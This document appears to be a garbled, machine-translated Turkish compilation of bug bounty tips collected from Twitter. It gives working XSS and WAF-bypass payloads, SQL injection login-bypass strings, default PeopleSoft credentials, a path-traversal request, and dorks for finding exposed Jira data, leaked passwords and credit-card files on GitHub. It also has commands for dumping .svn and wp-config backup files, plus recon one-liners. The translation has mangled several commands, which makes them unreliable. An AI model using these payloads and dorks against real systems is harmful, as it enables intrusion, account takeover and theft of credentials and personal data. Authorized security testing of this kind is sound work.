Twitter'dan böcek ödülü ipuçları
[ ] İpucu 1
İşte son bulgum (P1)
1- hesabı kaydet
2- engelleme isteği
3- işte resimdeki yanıt yani "role" parametresinde ROLE_USER var
Bu yüzden hesabıma ayrıcalık sağlamak için onu neyle değiştirebileceğimi bilmiyorum yöneticiye
4- kaynak kodunu açın ve js dosyalarına bakın
5-Yani js dosyalarında "user_role" hakkında arama yapmak için ctrl+F kullanın, "admin_role" adlı başka bir değer buldum 6- bu yüzden 7
değerini değiştirmek için match ve replace kullanıyorum
- hesabımı tam denetime sahip yönetici hesabına ayrıcalık tanıyın
[ ] İpucu 2
اسعد الله ايامكم بكل خير
IIS'de
IIS'nin Kullanılmasıyla İlgili Bilgiler
Yararlanma:
https//anywebsite.com/c:/Windows/Win.ini
[ ] İpucu 3
CloudFront bypass:⚔️
“>%0D%0A%0D%0A<x '=”foo”><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>
Bunun hedefe özel olup olmadığını veya diğer CloudFront web sitelerinin savunmasız olup olmadığını bilmek ister misiniz?
[ ] İpucu 4
1 : Wayback / Gau'dan tüm URL'yi alın
2 : httpx kullanarak js dosyasını filtreleyin 3 : Mnauly'nin tüm js dosyasını kontrol edin veya çekirdek şablonunu veya @trufflesec krom uzantısını
kullanabilirsiniz [ ] İpucu 5 target.com/wp-config .php => 404 bulunamadı target.com/wp-config.php.… ==> 200 tamam ve indirilen wp-config.php.swp ==>>200 tamam
bundan sonra, içeriği onaltılık kullanılarak kodlanmışsa, kodunu çözün.
[ ] İpucu 6
SQLi Kimlik Doğrulamasını Atlamayı Deneyin :⚔️
username:' — '/” — “
password:' — '/” — “
[ ] İpucu 7
varsayılan kimlik bilgileri:
PSADMIN:PSADMIN
PS:PS
PSEM:PSEM
Google Dork: intitle :”Oracle+PeopleSoft+Sign-in”
Tüm permütasyonları test etmek için bir çekirdek şablonu yazdı
[ ] İpucu 8
nmap -sV -iL host.txt -oN nmap_scan.txt
Birkaç saat bekleyin
cat nmap_scan.txt | grep açık
[ ] İpucu 9
Cynses arama ile bybass cloudfaire
https://youtu.be/VsM6ERUx_AA
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
— — — —
Xss yükü
https://github.com/Aacle/xss_payload
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
— — —
Sızan api için Nuclei kullanın.
$ nuclei -t /nuclei-templates/token-spray/ -var token={Tokeniniz}
— — — — — — — — — — — — — — — — — — — — — — — — — — —
— — — — — — — — — — — — — #TOR sqlmap -u “
ile tarayın
http://target_server/” — tor — tor-type=SOCKS5
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
— —
İpucu: — her zaman şirketin/Kuruluş çalışanlarının GitHub hesabını sızan ghp_ belirteci için kontrol edin
ve ana kuruluşun her deposuna erişimi kontrol edin
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
—
baypas uyarısı ==> [alert][0].call(this,1)
— — — — — — — — — — — — — — — — — — — — — — — — — — — —
— — — — — — — — — — — —
[ ] İpucu 10
1_ SHODAN'a gidin ve IP'yi alın
2 _ Dirsearch'e gidin ve Fuzzing yapın
3_ Hassas verileri elde etme
[ ] İpucu 11
Recon Recon Recon!!
Shodan Dorking Daima Kazanır.
ssl:”Company Inc”
Sonuçları http başlığına göre filtreleyin.
İlginç bir varlık bulmaya başlayın.
swagger-ui bulundu/
swagger ui xss ile denendi
https://github.com/seanmarpo/webjars-swagger-xss
[ ] İpucu 12
Hiç wc-db dosyasının ifşasını duydunuz mu?!
> şu şekilde kontrol edebilirsiniz:
https://target[.]com/.svn/wc.db
> bu aracı kullanarak tüm web sitesi kaynak kodunu boşaltabilirsiniz
https://github.com/anantshri/svn-extractor
[ ] İpucu 13
1. Shodan Dork -> Bazı Varlıklar.
2. Fuzzing ve /config dizininde 403 Forbidden var.
3. /config/FUZZ üzerinde kafa karıştırmak ve bazı yapılandırma dosyalarını almak.
4. Aynı model ve başka bir varlık üzerinde çalışır.
[ ] İpucu 14
Varsayılan Kimlik Bilgileri admin:admin
- shodan dork :
- ssl:”target[.]com” 200 http.title:”dashboard”
[ ] İpucu 15
Bugün denediğim JIRA yanlış yapılandırması hakkında kısa bir ileti dizisi.
3. Jira kontrol panellerini bulmak için Google dorkları.
inurl:/ConfigurePortalPages!default.jspa?view=popular
4. Jira filtreleri sayfasını bulmak için Google dork.
inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the public VEYA intext:Public )
[ ] İpucu 16
5. Açığa çıkan kullanıcı listesini bulmak için Google dork.
inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log
[ ] İpucu 17
GitHub Keşif İpucu: Gizli bilgileri içerme olasılığı yüksek olan CSV dosyalarını arayın dork
: “org:company extension:csv admin”
sızıntısı: “cc numarası, cvv, e-posta, telefon numarası”
[ ] Nilo, gxss ve Dalfox kullanan olası Reflected XSS için 18. İpucu Oneliner:cat targets | waybackurls | anew | grep “=” | gf xss | nilo | gxss -p test | dalfox pipe — skip-bav — only-poc r — silence — skip-mining-dom — ignore-return 302,404,403
[ ] İpucu 19
İpucu : "XML için GET isteği bulunamadı", isteği XXE yükü ile POST olarak değiştirir
[ ] İpucu 20
AlienVault'tan
$(cat HOSTS.txt); do gron “ https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1 " | grep “\burl\b” | gron — ungron | jq | egrep -wi 'url ' | awk '{print $2}' | sed 's/”//g'| sıralama -u | tee -a OUT.txt ;bitti
[ ] İpucu 21 PHPMYADMIN ```
baypas phpmyadmin =>301 PHPmyadmin =>200 PHPMYadmin =>200 PHPMYADMIN =>200 phpMYadmin =>200 phpmyAdmin =>200 ```
[ ] İpucu 22
SVN
```
1. ./dirsearch.py -u hedef -e php,html,js,xml -x 500,403
2. bulunduhttp://url.com/.svn/
3. klonla ve kullanhttps://github.com/anantshri/svn-extractor
4. ./svn-extractor.py — urlhttp://url.com— database.php ile eşleştirin 5. çıktı dizini ile sonuçlanır ve ```
açın.
[ ] İpucu 23
xss
```
içinde :
ad:<img src=x
ikinci ad:onerror
soyad:=alert(domain)/>
==========================
1:- Kullanınhttps://github.com/Leoid/MatchandReplace
2: - Burpsuite eşleşmesine aktarın ve değiştirin.
3:- Gospider'ı çalıştırın. gospider -s url -a -w — site haritası -r -c 100 -d 8 -phttp://127.0.0.1:8080
4:- Blind xss yükü geğirme ve gospider tarafından otomatik olarak eklenecektir.
Son olarak: - 4 KÖR XSS RAPORLARI.
```
[ ] İpucu 24
Çerez Bombası
```
Tanımlama bilgisinin süresi dolana kadar tüm istekler için tanımlama bilgisi uzunluğunun istek başlığı sınırlarını aşmasına neden olan URL.
1. Bir parametre tarafından ayarlanan bir Çerez bulun 2. Bu kullanıcıyı ```
yapana kadar parametreye mümkün olduğunca çok virgül ekleyin
[ ] İpucu 25
jwt aracılığıyla xss
```
1. Bir jwt belirteci yapın ve bir xss paylaod ekleyin.
2. Nihai url, url/dest?jwt=vulnerable-jwt-token gibidir.
(jwt= parametresi, sağlanan jwt belirtecinin kodunu çözüyordu ve onu sayfada gösteriyordu).
```
[ ] İpucu 26 ```
kıvırarak Özel Bilgi URL'lerini Alma 1. Hedefinizden yakalamanın veya test etmenin zor veya statik olduğunu düşündüğünüz tüm URL'leri alın 2. Tüm dosyaları any.txt dosyasına kaydedin 3. Komut : for i $(cat) herhangi bir.txt); do curl “$i” >> output.txt; yapılır 4. Aşağıdaki Anahtar Sözcükler için tüm kıvrılmış yanıt grep : sürücü. google dokümanlar. google /spreadsheets/d/ /document/d/ NOT: Bu, çok fazla önemsiz oluşturur, bu nedenle daha sonra silebilmeniz için klasör içinde gerçekleştirdiğinizden emin olun. Sulu bilgiler içeren URL'ler alacaksınız ```
[ ] İpucu 26
Telefon Numaraları alanına Yük Enjeksiyonu
```
https://twitter.com/Pwn2arn/status/1609146484263641089
```
[ ] İpucu 27
Kolay P1 upside_down_face
```
1: Mozila'daki geliştirici aracını kullanarak tüm Js dosyalarını toplayın
2: Geliştirme aracından aldığınız JS dosyalarında Bağlantı Bulucu Aracını çalıştırın veya Js Miner aracını kullanın
3: Şimdi manuel olarak kontrol edin hassas anahtar kelime js dosyası
```
[ ] İpucu 28
Son P1'im için ipuçları:
```
1 — Geliştirme için geliştirici portalı bulundu, Temel Kimlik Doğrulaması gerekiyor
2 — GitHub "etki alanı" docker'da arama yapın
3- özel depoyu çekmeye çalışan ve kullanıcı adını: pass
4'ü ileten bir kullanıcı buldu — Base64 Basic Auth
5'in kodunu çöz — Oturum açmış ve tüm Ürünlere tam erişim
```
[ ] İpucu 29
Aws,jira,okta vb. için Github sızıntısı
```
1. Org:”target” pwd/pass/passwd/password
2. “target. atlassian” pwd/pass/passwd/password
3. “hedef. okta” pwd/pass/passwd/password
4. “Jira. hedef” pwd/pass/passwd/password
```
[ ] İpucu 30
soucremap js
```
https://blog.prodefense.io/little-bug-big-impact-25k-bounty-9e47773f959f
https://github.com/rarecoil/unwebpack-sourcemap
```
[ ] İpucu 31
, bir site AngularJS kullanıyorsa, 49'un herhangi bir yerde oluşturulup oluşturulmadığını görmek için
``` test {{7*7}} yapın. Uygulama, XSS koruması etkinken ASP.NET ile oluşturulmuşsa , önce diğer güvenlik açığı türlerini test etmeye odaklanmak ve son çare olarak XSS'yi kontrol etmek isteyebilirsiniz .
AngularJS İstemci Tarafı Şablon Enjeksiyonu
https://github.com/tijme/angularjs-csti-scanner?fbclid=IwAR0z3X2XRXRugdCiGSMk_CHVn3-MZU1qFHWKVHXUEZ5oVPWOiYu4WwGqWhE
```
[ ] İpucu 32
Bir site Rails ile oluşturulmuşsa,
```
URL'lerin genellikle bir /CONTENT_TYPE/RECORD_ID kalıbı izlediğini biliyor olabilirsiniz; burada
RECORD_ID otomatik artırılan bir tam sayıdır. Örnek olarak HackerOne kullanıldığında, rapor URL'leri
www.hackerone.com/reports/12345 modelini izler .
Rails uygulamaları genellikle tamsayı kimliklerini kullanır, bu nedenle , bu güvenlik açığı türü geliştiricilerin gözden kaçırması kolay olduğundan, güvenli olmayan doğrudan nesne başvurusu güvenlik açıklarını test etmeye öncelik verebilirsiniz .
```
tüm kontrol listemdeki güvenlik açığını okuyabilirsiniz
iş mantığı , kayıt güvenlik açığı , 2fa'yı atlama , kimlik doğrulama , IDOR
Bu depodaki tüm kontrol listesi
https://github.com/Az0x7/vulnerability-Checklist
beni takip ediyor
- Linkedin , Twitter